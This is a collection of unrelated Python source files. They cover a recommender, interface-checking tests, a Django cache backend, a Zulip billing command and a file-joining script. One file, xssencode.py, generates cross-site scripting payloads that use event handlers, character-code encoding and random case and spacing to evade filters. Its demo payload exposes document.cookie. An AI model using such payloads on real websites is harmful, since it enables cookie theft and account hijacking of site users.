def get_content_vectors(self):
if self.content_vectors is None:
try:
self.content_vectors = pickle.load(open(self.CONTENT_VEC_DUMP, "rb"))
except Exception:
self.content_vectors = {}
return self.content_vectors
def get_user_preference_vectors(self):
if self.user_preference_vectors is None:
try:
self.user_preference_vectors = pickle.load(open(self.USER_PREF_VEC_DUMP, "rb"))
except Exception:
self.user_preference_vectors = {}
return self.user_preference_vectors
def get_user_visited_content(self):
if self.user_visited_content is None:
try:
self.user_visited_content = pickle.load(open(self.USER_CONTENT_DUMP, "rb"))
except Exception:
self.user_visited_content = {}
return self.user_visited_content
def save_user_preference_vector(self, user_preference_vectors):
self.user_preference_vectors = user_preference_vectors
pickle.dump(self.user_preference_vectors, open(self.USER_PREF_VEC_DUMP, "wb"))
def save_content_vectors(self, content_vectors):
self.content_vectors = content_vectors
pickle.dump(self.content_vectors, open(self.CONTENT_VEC_DUMP, "wb"))
def save_user_visited_content(self, user_visited_content):
self.user_visited_content = user_visited_content
pickle.dump(self.user_visited_content, open(self.USER_CONTENT_DUMP, "wb"))
def create_content_vector(self, content_keywords):
keywords = self.get_keywords()
content_vector = np.zeros(len(keywords))
for i, keyword in enumerate(keywords):
content_vector[i] = content_keywords.get(keyword, 0.0)
return content_vector
def add_content_vector(self, content_id, content_keywords):
content_vector = self.create_content_vector(content_keywords)
content_vectors = self.get_content_vectors()
content_vectors[content_id] = content_vector
self.save_content_vectors(content_vectors)
def update_user_preference_vector(self, user_id, content_keywords, content_id=None):
user_visited_content = self.get_user_visited_content()
preference_vectors = self.get_user_preference_vectors()
has_index = user_id in user_visited_content
if not has_index or content_id is None:
user_visited_content[user_id] = []
if content_id is not None:
user_visited_content[user_id].append(content_id)
user_pref_vec = []
content_vector = self.create_content_vector(content_keywords)
user_pref_vec.append(content_vector)
preference_vectors[user_id] = user_pref_vec
elif content_id not in user_visited_content[user_id]:
user_visited_content[user_id].append(content_id)
user_pref_vec = preference_vectors[user_id]
content_vector = self.create_content_vector(content_keywords)
user_pref_vec = np.add(user_pref_vec, content_vector) / 2
preference_vectors[user_id] = user_pref_vec
self.save_user_visited_content(user_visited_content)
self.save_user_preference_vector(preference_vectors)
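    # Minimal usage sketch (hypothetical ids and keyword weights; not part of
    # the original module). Pickle dump files are written to the working dir:
    #
    #     rec = Recommender()
    #     rec.set_keywords(['python', 'recommender'])
    #     rec.add_content_vector('doc-1', {'python': 0.9, 'recommender': 0.5})
    #     rec.update_user_preference_vector('user-1', {'python': 0.7})
    #     print rec.recommend('user-1')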
def recommend(self, user_id):
recommendations = {'recommendations': []}
user_pref_vecs = self.get_user_preference_vectors()
if user_id in user_pref_vecs:
user_pref_vec = np.array(user_pref_vecs[user_id])
user_visited_content = self.get_user_visited_content()
for content_id, content_vec in self.get_content_vectors().iteritems():
if (user_pref_vec.sum() != 0.0) and (content_vec.sum() != 0.0) and str(content_id) not in user_visited_content[user_id]:
similarity = user_pref_vec.dot(content_vec) / (norm(user_pref_vec) * norm(content_vec))
print 'sim2: %f' % similarity
if similarity > 0.0:
recommendations['recommendations'].append({'globo_id': content_id, 'weight': similarity[0]})
return recommendations
| marcospy/hackathon-globo-app | recommender/recommender.py | Python | mit | 5,022 |
# Copyright 2017-2020 Kamil Sindi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import pytest
from implements import Interface, implements, get_mro
py36 = pytest.mark.skipif(sys.version_info < (3, 6), reason='requires py3.6')
def test_empty():
class FooInterface(Interface):
pass
@implements(FooInterface)
class FooImplementation:
pass
def test_with_args_kwargs():
class FooInterface(Interface):
def foo(self, a, *args, b=1, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, a, *args, b=7):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, *args, b=1, **kwargs):
pass
def test_with_kwarg_only():
class FooInterface(Interface):
def foo(self, a, *, b):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, a, b):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, *, b):
pass
def test_property():
class FooInterface(Interface):
@property
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
def test_property_inverse():
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
def test_setters():
class FooInterface(Interface):
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
def test_deleters():
class FooInterface(Interface):
@property
def foo(self):
pass
@foo.deleter
def foo(self, val):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.deleter
def foo(self, val):
pass
def test_implementation_implements_more_descriptors():
class FooInterface(Interface):
@property
def foo(self):
pass
# An implementation must implement all data descriptors defined in
# the interface, however, the implementation could define more.
#
# The case below must not generate errors because FooImplementationPass
# defines a foo.setter which isn't defined by FooInterface
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
@foo.setter
def foo(self, val):
pass
def test_missing_method():
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self):
pass
def test_missing_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_renamed_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arrrrg):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_extra_argument():
class FooInterface(Interface):
def foo(self, arg):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg, ument):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg):
pass
def test_different_defaults():
class FooInterface(Interface):
def foo(self, arg=7):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg=8):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg=7):
pass
def test_different_order():
class FooInterface(Interface):
def foo(self, a, b):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, b, a):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, a, b):
pass
def test_missing_kwargs():
class FooInterface(Interface):
def foo(self, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, **kwargs):
pass
def test_missing_property():
class FooInterface(Interface):
@property
def foo(self):
pass
with pytest.raises(NotImplementedError): # missing method
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass
with pytest.raises(NotImplementedError): # missing property decorator
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
@property
def foo(self):
pass
def test_bad_constructor():
class FooInterface(Interface):
def __init__(self, a):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def __init__(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def __init__(self, a):
pass
def test_multiple_errors():
class FooInterface(Interface):
@property
def foo(self):
pass
def __init__(self, a):
pass
# Bad constructor, missing method getter, and missing class attribute (3)
match = r'^Found 3 errors in implementation:\n- .+\n- .+\n- .+\nwith .+'
with pytest.raises(NotImplementedError, match=match):
@implements(FooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def __init__(self):
pass
def test_static():
class FooInterface(Interface):
@staticmethod
def foo(a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass # missing foo
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
# skipcq: PYL-E0213
def foo(a, b, c): # missing staticmethod decorator
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail3: # skipcq: PYL-W0612
@classmethod # classmethod instead of staticmethod
def foo(cls, a, b, c): # decorator-check fails before signature
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail4: # skipcq: PYL-W0612
@staticmethod
def foo(m, n, o): # staticmethod, but wrong signature
pass
@implements(FooInterface)
class FooImplementationPass:
@staticmethod
def foo(a, b, c):
pass
def test_classmethods():
class FooInterface(Interface):
@classmethod
def foo(cls, a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail1: # skipcq: PYL-W0612
pass # missing foo
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail2: # skipcq: PYL-W0612
# skipcq: PYL-E0213
def foo(cls, a, b, c): # missing classmethod decorator
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail3: # skipcq: PYL-W0612
@staticmethod # staticmethod instead of classmethod
def foo(a, b, c): # decorator-check fails before signature
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail4: # skipcq: PYL-W0612
@classmethod
def foo(cls, m, n, o): # classmethod, but wrong signature
pass
@implements(FooInterface)
class FooImplementationPass:
@classmethod
def foo(cls, a, b, c):
pass
def test_classmethod_signature_match():
# For a classmethod, inspect.signature returns a signature with the first
# element (cls) stripped. A classmethod with signature (cls, a, b, c) has
# signature equivalence with a regular method with signature (a, b, c)
#
# Example:
from inspect import signature
class TestA:
@classmethod
def foo(cls, a, b, c):
pass
class TestB:
# skipcq: PYL-E0213
def foo(a, b, c):
pass
assert signature(TestA.foo) == signature(TestB.foo)
# The test below ensures that the above case is flagged
class FooInterface(Interface):
@classmethod
def foo(cls, a, b, c):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
# skipcq: PYL-E0213
def foo(a, b, c):
pass
def test_staticmethod_classmethod_with_decorator():
class FooBarInterface(Interface):
@staticmethod
def foo(a, b, c):
pass
@classmethod
def bar(cls, a, b, c):
pass
import functools
def decorator(func):
@functools.wraps(func)
def inner(*args, **kwargs):
return func(*args, **kwargs)
return inner
@implements(FooBarInterface)
class FooBarImplementationPass:
@staticmethod
@decorator
def foo(a, b, c):
pass
@classmethod
@decorator
def bar(cls, a, b, c):
pass
def test_kwargs_only():
class FooInterface(Interface):
def foo(self, *, a):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementation:
def foo(self, a):
pass
def test_multiple_interfaces():
class FooInterface(Interface):
def foo(self):
pass
class BarInterface(Interface):
def bar(self):
pass
with pytest.raises(NotImplementedError):
@implements(BarInterface)
@implements(FooInterface)
class FooImplementationNoBar:
def foo(self, a):
pass
with pytest.raises(NotImplementedError):
@implements(BarInterface)
@implements(FooInterface)
class FooImplementationNoFoo:
def bar(self, a):
pass
@implements(BarInterface)
@implements(FooInterface)
class FooImplementation:
def foo(self):
pass
def bar(self):
pass
def test_interface_name_collision():
class Foo1Interface(Interface):
def foo(self):
pass
class Foo2Interface(Interface):
def foo(self):
pass
@implements(Foo2Interface)
@implements(Foo1Interface)
class FooImplementation:
def foo(self):
pass
def test_interface_name_and_signature_collision():
class Foo1Interface(Interface):
def foo(self):
pass
class Foo2Interface(Interface):
def foo(self) -> str:
return 'foo'
# Two interfaces with different signatures for a given method will
# always result in failure for the implementing class, as the
# implemented method's signature can only satisfy one of the interfaces.
with pytest.raises(NotImplementedError):
@implements(Foo2Interface)
@implements(Foo1Interface)
class FooImplementationFail:
def foo(self):
pass
def test_interface_inheritance():
class BaseInterface(Interface):
def bar(self):
pass
class FooInterface(BaseInterface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self):
pass
def bar(self):
pass
def test_class_inheritance():
class FooInterface(Interface):
def foo(self):
pass
@implements(FooInterface)
class ParentImplementation:
def foo(self):
pass
@implements(FooInterface)
class ChildImplementation(ParentImplementation):
pass
def test_class_multiple_inheritance():
# --------- INTERFACES -----------------------------------------------
#
class FooInterface(Interface):
def foo(self, final):
pass
class BarInterface(Interface):
def bar(self, final):
pass
class FooBarInterface(FooInterface, BarInterface):
pass
# --------- IMPLEMENTATION -------------------------------------------
#
class BaseFooImplementation: # must get overridden
def foo(self, override, my, args):
pass
@implements(FooInterface)
class FooImplementation(BaseFooImplementation):
def foo(self, final): # skipcq: PYL-W0221
pass
@implements(BarInterface)
class BarImplementation:
def bar(self, final):
pass
with pytest.raises(NotImplementedError):
@implements(FooBarInterface)
class SubFooImplementation(FooImplementation): # foo, no bar
pass
@implements(FooInterface)
@implements(BarInterface)
@implements(FooBarInterface)
class FooBarImplementation(FooImplementation, BarImplementation):
pass
def test_rtn_type_annotation():
class FooInterface(Interface):
def foo(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self) -> int:
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self) -> str:
pass
def test_arg_type_annotation():
class FooInterface(Interface):
def foo(self, arg: str):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
def foo(self, arg: int):
pass
@implements(FooInterface)
class FooImplementationPass:
def foo(self, arg: str):
pass
def test_other_decorator_compat():
def decorator(cls):
class Wrapper:
def __init__(self, *args):
self.wrapped = cls(*args)
def __getattr__(self, name):
print('Getting the {} of {}'.format(name, self.wrapped))
return getattr(self.wrapped, name, None)
return Wrapper
class FooInterface(Interface):
def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
@decorator
class FooImplementationFail:
def __init__(self, x, y):
self.x = x
self.y = y
def foo(self):
pass
@decorator
@implements(FooInterface)
class FooImplementationPass:
def __init__(self, x, y):
self.x = x
self.y = y
def foo(self):
pass
def test_magic_methods():
class FooInterface(Interface):
def __add__(self, other):
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
def __add__(self, other):
pass
def test_attributes():
class FooInterface(Interface):
a = None
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
a = 1
b = 2
def test_async():
class AsyncInterface:
async def __aenter__(self):
return self
async def __aexit__(self, *args, **kwargs):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncInterface)
class AsyncImplementation:
pass
def test_async_method():
class AsyncFooInterface:
async def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncFooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def foo(self):
pass
@implements(AsyncFooInterface)
class AsyncFooImplementation: # skipcq: PYL-W0612
async def foo(self):
pass
def test_generator():
class GenFooInterface:
def foo(self): # skipcq: PYL-R0201
yield 1
with pytest.raises(NotImplementedError):
@implements(GenFooInterface)
class FooImplementationFail: # skipcq: PYL-W0612
def foo(self):
pass
# must fail a generator which happens to be async
with pytest.raises(NotImplementedError):
@implements(GenFooInterface)
class AsyncGenFooImplementationFail: # skipcq: PYL-W0612
async def foo(self):
yield 1
@implements(GenFooInterface)
class GenFooImplementation: # skipcq: PYL-W0612
def foo(self): # skipcq: PYL-R0201
yield 1
def test_asyncgen_method():
class AsyncGenFooInterface:
async def foo(self):
yield 1
with pytest.raises(NotImplementedError):
@implements(AsyncGenFooInterface)
class AsyncFooImplementationFail: # skipcq: PYL-W0612
async def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncGenFooInterface)
class GenFooImplementationFail: # skipcq: PYL-W0612
def foo(self): # skipcq: PYL-R0201
yield 1
@implements(AsyncGenFooInterface)
class AsyncGenFooImplementation: # skipcq: PYL-W0612
async def foo(self):
yield 1
@py36
def test_new_style_descriptors():
class IntField:
def __get__(self, instance, owner):
return instance.__dict__[self.name]
def __set__(self, instance, value):
if not isinstance(value, int):
raise ValueError('expecting integer in {}'.format(self.name))
instance.__dict__[self.name] = value
def __set_name__(self, owner, name):
self.name = name # skipcq: PYL-W0201
class FooInterface(Interface):
int_field = IntField()
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
int_field = IntField()
@py36
def test_new_style_metaclasses():
class Polygon:
def __init_subclass__(cls, sides, **kwargs):
cls.sides = sides
if cls.sides < 3:
raise ValueError('polygons need 3+ sides')
@classmethod
def interior_angles(cls):
return (cls.sides - 2) * 180
class PolygonInterface(Interface):
def rotate(self):
pass
@implements(PolygonInterface)
class Triangle(Polygon, sides=3):
def rotate(self):
pass
def test_descriptors_signature_getter():
class FooInterface(Interface):
@property
def someprop(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self) -> int:
pass
def test_descriptors_signature_setter():
class FooInterface(Interface):
@property
def someprop(self):
pass
@someprop.setter
def someprop(self, value: str) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self):
pass
@someprop.setter
def someprop(self, value: int) -> float:
pass
def test_descriptors_signature_deleter():
class FooInterface(Interface):
@property
def someprop(self):
pass
@someprop.deleter
def someprop(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self):
pass
@someprop.deleter
def someprop(self) -> int:
pass
def test_get_mro():
class RegularClass:
pass
mro = get_mro(RegularClass)
assert object not in mro
expected = RegularClass.mro()[:-1]
assert mro == expected
def test_class_hierarchy_overlap_of_common_class():
class CommonClass:
pass
class FooInterface(CommonClass):
def abc(self) -> str:
pass
with pytest.raises(ValueError):
@implements(FooInterface)
        class FooImplementation(CommonClass):
def abc(self) -> str:
pass
def test_implementation_inheriting_from_interface():
class FooInterface:
def abc(self) -> str:
pass
with pytest.raises(ValueError):
@implements(FooInterface)
        class FooImplementation(FooInterface):
def abc(self) -> str:
pass
| ksindi/implements | tests.py | Python | mit | 24,860 |
"Django-compatible disk and file backed cache."
from django.core.cache.backends.base import BaseCache
try:
from django.core.cache.backends.base import DEFAULT_TIMEOUT
except ImportError:
# For older versions of Django simply use 300 seconds.
DEFAULT_TIMEOUT = 300
from .fanout import FanoutCache
class DjangoCache(BaseCache):
"Django-compatible disk and file backed cache."
def __init__(self, directory, params):
"""Initialize DjangoCache instance.
:param str directory: cache directory
:param dict params: cache parameters
"""
super(DjangoCache, self).__init__(params)
shards = params.get('SHARDS', 8)
timeout = params.get('DATABASE_TIMEOUT', 0.010)
options = params.get('OPTIONS', {})
self._directory = directory
self._cache = FanoutCache(directory, shards, timeout, **options)
self.memoize = self._cache.memoize
@property
def directory(self):
"""Cache directory."""
return self._directory
def deque(self, name):
"""Return Deque with given `name` in subdirectory.
:param str name: subdirectory name for Deque
:return: Deque with given name
"""
return self._cache.deque(name)
def index(self, name):
"""Return Index with given `name` in subdirectory.
:param str name: subdirectory name for Index
:return: Index with given name
"""
return self._cache.index(name)
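    # Minimal usage sketch (not part of this module); assumes Django settings
    # configure this backend, e.g.
    #     CACHES = {'default': {'BACKEND': 'diskcache.DjangoCache',
    #                           'LOCATION': '/tmp/django-cache'}}
    #
    #     from django.core.cache import cache
    #     cache.set('greeting', 'hello', timeout=60)
    #     assert cache.get('greeting') == 'hello'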
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None,
read=False, tag=None, retry=True):
"""Set a value in the cache if the key does not already exist. If
timeout is given, that timeout will be used for the key; otherwise the
default cache timeout will be used.
Return True if the value was stored, False otherwise.
:param key: key for item
:param value: value for item
:param float timeout: seconds until the item expires
(default 300 seconds)
:param int version: key version number (default None, cache parameter)
:param bool read: read value as bytes from file (default False)
:param str tag: text to associate with key (default None)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was added
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
timeout = self.get_backend_timeout(timeout=timeout)
return self._cache.add(key, value, timeout, read, tag, retry)
def get(self, key, default=None, version=None, read=False,
expire_time=False, tag=False, retry=False):
"""Fetch a given key from the cache. If the key does not exist, return
default, which itself defaults to None.
:param key: key for item
:param default: return value if key is missing (default None)
:param int version: key version number (default None, cache parameter)
:param bool read: if True, return file handle to value
(default False)
:param float expire_time: if True, return expire_time in tuple
(default False)
:param tag: if True, return tag in tuple (default False)
:param bool retry: retry if database timeout expires (default False)
:return: value for item if key is found else default
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
return self._cache.get(key, default, read, expire_time, tag, retry)
def read(self, key, version=None):
"""Return file handle corresponding to `key` from Cache.
:param key: Python key to retrieve
:param int version: key version number (default None, cache parameter)
:return: file open for reading in binary mode
:raises KeyError: if key is not found
"""
key = self.make_key(key, version=version)
return self._cache.read(key)
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None,
read=False, tag=None, retry=True):
"""Set a value in the cache. If timeout is given, that timeout will be
used for the key; otherwise the default cache timeout will be used.
:param key: key for item
:param value: value for item
:param float timeout: seconds until the item expires
(default 300 seconds)
:param int version: key version number (default None, cache parameter)
:param bool read: read value as bytes from file (default False)
:param str tag: text to associate with key (default None)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was set
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
timeout = self.get_backend_timeout(timeout=timeout)
return self._cache.set(key, value, timeout, read, tag, retry)
def pop(self, key, default=None, version=None, expire_time=False,
tag=False, retry=True):
"""Remove corresponding item for `key` from cache and return value.
If `key` is missing, return `default`.
Operation is atomic. Concurrent operations will be serialized.
:param key: key for item
:param default: return value if key is missing (default None)
:param int version: key version number (default None, cache parameter)
:param float expire_time: if True, return expire_time in tuple
(default False)
:param tag: if True, return tag in tuple (default False)
:param bool retry: retry if database timeout expires (default True)
:return: value for item if key is found else default
"""
key = self.make_key(key, version=version)
return self._cache.pop(key, default, expire_time, tag, retry)
def delete(self, key, version=None, retry=True):
"""Delete a key from the cache, failing silently.
:param key: key for item
:param int version: key version number (default None, cache parameter)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was deleted
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
        return self._cache.delete(key, retry)
def incr(self, key, delta=1, version=None, default=None, retry=True):
"""Increment value by delta for item with key.
If key is missing and default is None then raise KeyError. Else if key
is missing and default is not None then use default for value.
Operation is atomic. All concurrent increment operations will be
counted individually.
Assumes value may be stored in a SQLite column. Most builds that target
machines with 64-bit pointer widths will support 64-bit signed
integers.
:param key: key for item
:param int delta: amount to increment (default 1)
:param int version: key version number (default None, cache parameter)
:param int default: value if key is missing (default None)
:param bool retry: retry if database timeout expires (default True)
:return: new value for item on success else None
:raises ValueError: if key is not found and default is None
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
try:
return self._cache.incr(key, delta, default, retry)
except KeyError:
raise ValueError("Key '%s' not found" % key)
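    # Worked example (sketch): after cache.set('hits', 0), cache.incr('hits')
    # returns 1; cache.incr('missing') with default=None raises ValueError.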
def decr(self, key, delta=1, version=None, default=None, retry=True):
"""Decrement value by delta for item with key.
If key is missing and default is None then raise KeyError. Else if key
is missing and default is not None then use default for value.
Operation is atomic. All concurrent decrement operations will be
counted individually.
Unlike Memcached, negative values are supported. Value may be
decremented below zero.
Assumes value may be stored in a SQLite column. Most builds that target
machines with 64-bit pointer widths will support 64-bit signed
integers.
:param key: key for item
:param int delta: amount to decrement (default 1)
:param int version: key version number (default None, cache parameter)
:param int default: value if key is missing (default None)
:param bool retry: retry if database timeout expires (default True)
:return: new value for item on success else None
:raises ValueError: if key is not found and default is None
"""
# pylint: disable=arguments-differ
return self.incr(key, -delta, version, default, retry)
def has_key(self, key, version=None):
"""Returns True if the key is in the cache and has not expired.
:param key: key for item
:param int version: key version number (default None, cache parameter)
:return: True if key is found
"""
key = self.make_key(key, version=version)
return key in self._cache
def expire(self):
"""Remove expired items from cache.
:return: count of items removed
"""
return self._cache.expire()
def stats(self, enable=True, reset=False):
"""Return cache statistics hits and misses.
:param bool enable: enable collecting statistics (default True)
:param bool reset: reset hits and misses to 0 (default False)
:return: (hits, misses)
"""
return self._cache.stats(enable=enable, reset=reset)
def create_tag_index(self):
"""Create tag index on cache database.
It is better to initialize cache with `tag_index=True` than use this.
:raises Timeout: if database timeout expires
"""
self._cache.create_tag_index()
def drop_tag_index(self):
"""Drop tag index on cache database.
:raises Timeout: if database timeout expires
"""
self._cache.drop_tag_index()
def evict(self, tag):
"""Remove items with matching `tag` from cache.
:param str tag: tag identifying items
:return: count of items removed
"""
return self._cache.evict(tag)
def clear(self, **kwargs):
"Remove *all* values from the cache at once."
# pylint: disable=unused-argument
return self._cache.clear()
def close(self, **kwargs):
"Close the cache connection."
# pylint: disable=unused-argument
self._cache.close()
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""Return seconds to expiration.
:param float timeout: seconds until the item expires
(default 300 seconds)
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
elif timeout == 0:
# ticket 21147 - avoid time.time() related precision issues
timeout = -1
return None if timeout is None else timeout
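    # Mapping sketch: get_backend_timeout(None) -> None (never expires);
    # get_backend_timeout(0) -> -1 (treated as already expired, ticket 21147);
    # get_backend_timeout(DEFAULT_TIMEOUT) -> self.default_timeout.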
| pymedusa/SickRage | ext/diskcache/djangocache.py | Python | gpl-3.0 | 11,256 |
from typing import Any
from django.conf import settings
from zerver.lib.management import ZulipBaseCommand
if settings.BILLING_ENABLED:
from corporate.lib.stripe import invoice_plans_as_needed
class Command(ZulipBaseCommand):
help = """Generates invoices for customers if needed."""
def handle(self, *args: Any, **options: Any) -> None:
if settings.BILLING_ENABLED:
invoice_plans_as_needed()
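# Usage sketch (assuming Zulip's standard management entry point):
#   ./manage.py invoice_plans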
| andersk/zulip | zilencer/management/commands/invoice_plans.py | Python | apache-2.0 | 430 |
import glob
import os
import time
import json
with open('settings.json') as data_file:
settings = json.load(data_file)
input_folder = settings["input_folder"]
output_folder = settings["output_folder"]
output_name = settings["output_name"]
extension = settings["extension"]
custom_sorting = settings["custom_sorting"]
order = settings["indexed_order"]
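# Example settings.json (a sketch; every value below is an assumption):
# {
#     "input_folder": "input",
#     "output_folder": "output",
#     "output_name": "joined",
#     "extension": ".txt",
#     "custom_sorting": true,
#     "indexed_order": [2, 0, 1]
# }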
read_content = ""
if not os.path.exists(input_folder):
print ("input folder doesn't exists... Try again.")
time.sleep(3)
else:
joined_files = glob.glob(input_folder + "/*" + extension)
    if custom_sorting:
        ordered_files = [joined_files[i] for i in order]
    else:
        ordered_files = joined_files
    for path in ordered_files:
        with open(path, "r") as read_file:
            read_content += read_file.read() + "\n\n"
if not os.path.exists(output_folder):
os.makedirs(output_folder)
returned_file = open(output_folder + "/" + output_name + extension, "w")
returned_file.write(read_content)
returned_file.close()
print ("Done!")
time.sleep(3)
| brunurd/jscompiler.py | sfconcat.py | Python | cc0-1.0 | 1,214 |
from .PETScMatOps import *
| wathen/PhD | MHD/FEniCS/MyPackage/PackageName/PETScFunc/__init__.py | Python | mit | 26 |
import random
def randomurl():
chars='abcdefghijklmnopqrstuvwxyz'
length=random.randint(5, 20)
choice=random.choice
return ''.join(choice(chars) for i in range(length))+'.com'
def xssencode(javascript):
javascript2='eval(String.fromCharCode(%s))' % ','.join(str(ord(i)) for i in javascript)
for js in [javascript, javascript2]:
options=['<script>{}</script>',
'<a onmouseover="{}">%s</a>' % (' '*random.randint(0, 250)),
                 '<div onmouseover="{}">%s</div>' % (' '*random.randint(0, 250)),
'<span onmouseover="{}">%s</span>' % (' '*random.randint(0, 250)),
'<img onmouseover="{}" src="#"/>',
'<img onmouseover="{}"/>',
'<img onerror="{}" src="/"/>',
'<img onerror="{}" src="%s"/>' % randomurl(),
'<iframe onmouseover="{}" src="#"></iframe>',
'<body onload={}>',]
for i in options:
i=''.join(a.upper() if random.randint(0,1) else a.lower() for a in i)
i=''.join(a if random.randint(0,1) or a!='>' else ' >' for a in i)
i=''.join(a if random.randint(0,1) or a!=' ' else ' ' for a in i)
yield i.format(js)
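# Each call yields randomized payload variants; illustrative output only
# (case, spacing, and tag choice vary per run):
#   <ScRipT>alert('XSS: '+document.cookie)</ScRipT >
#   <img onerror="eval(String.fromCharCode(97,108,101,...))" src="/"/>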
if __name__=='__main__':
attack="alert('XSS: '+document.cookie)"
print('\n'.join(xssencode(attack)))
| RaspPiTor/JAPTT | XSS/xssencode.py | Python | mit | 1,283 |
# Pretty-printers for bounds registers.
# Copyright (C) 2013-2016 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
